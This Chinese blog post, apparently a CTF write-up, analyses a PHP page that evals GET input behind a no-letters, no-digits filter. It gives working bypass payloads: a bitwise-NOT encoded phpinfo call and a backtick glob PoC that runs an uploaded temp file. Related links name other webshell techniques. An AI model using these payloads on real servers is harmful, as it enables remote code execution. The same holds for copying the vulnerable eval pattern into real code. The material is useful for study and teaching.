无字母数字webshell的命令执行

最新推荐文章于 2024-08-15 15:00:52 发布
最新推荐文章于 2024-08-15 15:00:52 发布
阅读量359 收藏 3
点赞数 7
分类专栏: RCE 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61802503/article/details/141113303
版权

无字母数字webshell的命令执行

  • 代码:
<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

代码分析:
这段PHP代码存在严重的安全风险,尤其是它使用了eval()函数,这是一个非常危险的函数,因为它会执行字符串作为PHP代码。下面是对这段代码的详细分析:

  1. 检查代码长度

    • 如果$code的长度超过35个字符,脚本将终止并输出"Long."。

  2. 检查代码内容

    • 使用preg_match()函数检查$code是否包含任何字母(无论大小写)、数字、下划线或美元符号($)。
    • 如果$code包含这些字符之一,脚本将终止并输出"NO."。

  3. 执行代码

    • 如果$code通过了上述所有检查,它将使用eval()函数执行。
  • PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。所以,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。

所以很简单了,构造一个可以生成phpinfo这个字符串的PHP表达式即可。payload如下(不可见字符用url编码表示):

在PHP7中

(~%8F%97%8F%96%91%99%90)();

在这里插入图片描述

在PHP5中

  • PHP5不支持 ('phpinfo')();
  1. shell下可以利用.来执行任意脚本
  2. Linux文件名支持用glob通配符代替

构造POC

?><?=. /???/???[@-[];?>
在这里插入图片描述

CyberSecure
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
Web安全】无字母数字Webshell总结 在Web安全领域,Webshell是一种常见的攻击手段,用于在目标服务器上获得远程控制。无字母数字Webshell是指避开常规字母数字字符限制的Webshell构造方法。通常,服务器会通过...
字母数字webshell进阶收藏版1
08-03
【标题】:“无字母数字webshell进阶收藏版1” 【描述】:本文主要探讨了在Webshell中如何使用无字母数字的Unicode编码进行高级技巧的实现,包括原理、缩短和压榨三个部分。 【正文】: Webshell是一种用于远程...
字母数字webshell命令执行
plzdonotlietome的博客
08-11 1142
字母数字webshell命令执行
RCE-无字母数字webshell命令执行
2301_78549931的博客
08-12 621
这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。可以看出存在这么多的文件,执行第一个匹配上的文件(即/bin/addr2l ine)的时候就已经出现了错误,导致整个流程停止,根本不会执行到我们上传的文件。那么,/tmp/phpXXXXXX就可以表示为/*/?这是由于执行. /?
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2048
命令执行字母数字webshell
字母数字webshell命令执行
weixin_71398630的博客
08-11 437
那么答案就呼之欲出了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。所有方法,都用到了PHP中的变量,需要对变量进行变形、异或、取反等操作,最后动态执行函数。或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是。因为反引号不属于“字母”、“数字”,所以我们可以执行系统命令,但问题来了:如何利用无字母数字
字母数字执行webshell命令
m0_74800552的博客
08-11 183
第七行的if语句用正则过滤了数字字母和_,所以传递的参数不能包含这些元素,否则无法进入eval()函数。
命令执行无回显以及无字母数字命令执行
m0re's blog
09-13 1737
前言:最近比赛的时候看到有关命令执行的题目,然后解题过程中发现了无字母数字命令执行,所以这篇文章学习一下这个知识。 本文目录CTFshow web入门55CTFshow红包题第二弹 以ctfshow的题目来学习一下。 CTFshow web入门55 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modifie
字母数字通过命令执行上传webshell复现
wzzzzz06的博客
08-11 613
的形式来执行phpinfo()函数,因此只需要构造一个可以生成phpinfo这一串字符串的PHP表达式皆可,payload:(~%8F%97%8F%96%91%99%90)();感受:感觉非洲人还是不适合做这个,我随机生成临时文件半天,全是小写字母或者数字,搞得我以为前面做错了,还得排错,愣是卡了20多分钟,最后还是靠着sleep函数,send+cancel不断生成临时文件,最后发现有大写才搞定。
字母数字webshell总结
hackzkaq的博客
05-07 1969
零基础学黑客,搜索公众号:白帽子左一 关于无字母数字Webshell这个话题,可以说是老生常谈了。之前打 CTF 的时候也经常会遇到,每次都让人头大,所谓无字符webshell,其基本原型就是对以下代码的绕过: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } ## 基础知识 ## PHP中的异或 来看这样一段代码: <?php echo "5"^"Z"; ?> 结果
字母数字webshell
m0_65429684的博客
04-22 1693
核心思路是,将非字母数字的字符经过各种变换,最后能构造出a-z中任意一个字符。然后再利用PHP允许动态函数执行的特点,拼接处一个函数名,如“assert”,然后动态执行之即可。在此之前,我需要说说php5和7的差异。php5中assert是一个函数,我们可以通过$f='assert';$f(...);这样的方法来动态执行任意代码。但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。
SweetPotato_webshell执行命令版1
08-03
前言管道引用申明if(CreatePipe(ref out_read, ref out_write, ref saAttr, 0)){Console.Write
.NETWebShell:.net 命令执行webshell
05-06
.NETWebShell2021.03.11 动态编译实现任意命令执行,Windows Defender 免杀
浅谈在WEBSHELL下如何运行命令
02-24
随着互联网的发展和互联网用户的快速增长,越来越多的应用都转向B/S结构,因为它是跨平台的、易操作的、方便的、迅速的,这样不论用户使用什么样的操作系统,仅仅需要安装一个浏览器就能享受在线购物、网上支付、看...
文件上传-.user.ini利用
feiwujiushiwo的博客
08-13 226
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
PHP图书借阅微信小程序系统源码
2401_84414018的博客
08-12 262
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
多媒体技术及应用课程思政网站
最新发布
m0_73706453的博客
08-15 395
在Internet高速发展的今天,我们生活的各个领域都涉及到计算机的应用,其中包括多媒体技术及应用课程思政网站的网络应用,在外国多媒体技术及应用课程思政已经是很普遍的方式,不过国内的多媒体技术及应用课程思政可能还处于起步阶段。多媒体技术及应用课程思政网站具有学习音频功能。多媒体技术及应用课程思政网站采用PHP语言,Thinkphp5框架,基于mysql开发,实现了首页、个人中心、学生管理、教师管理、课程分类管理、学习视频管理、学习课程管理、学习音频管理、课程笔记管理、反馈留言、系统管理等内容进行管理,本系
PHPExcel兼容php7.4以上版本
itfans123的博客
08-15 161
参考官方文档:7.4 版本的向后不兼容更改,非数组的数组样式访问,现在,尝试将 null,bool,int,float 或 resource 类型的值用作数组 ( 例如 $null[“key”] )修改后的PHPExcel链接:https://pan.quark.cn/s/425905b39a48。php7.4后不支持 array{} 这种形式数组取值。PHPExcel 在php下报错。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CyberSecure

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值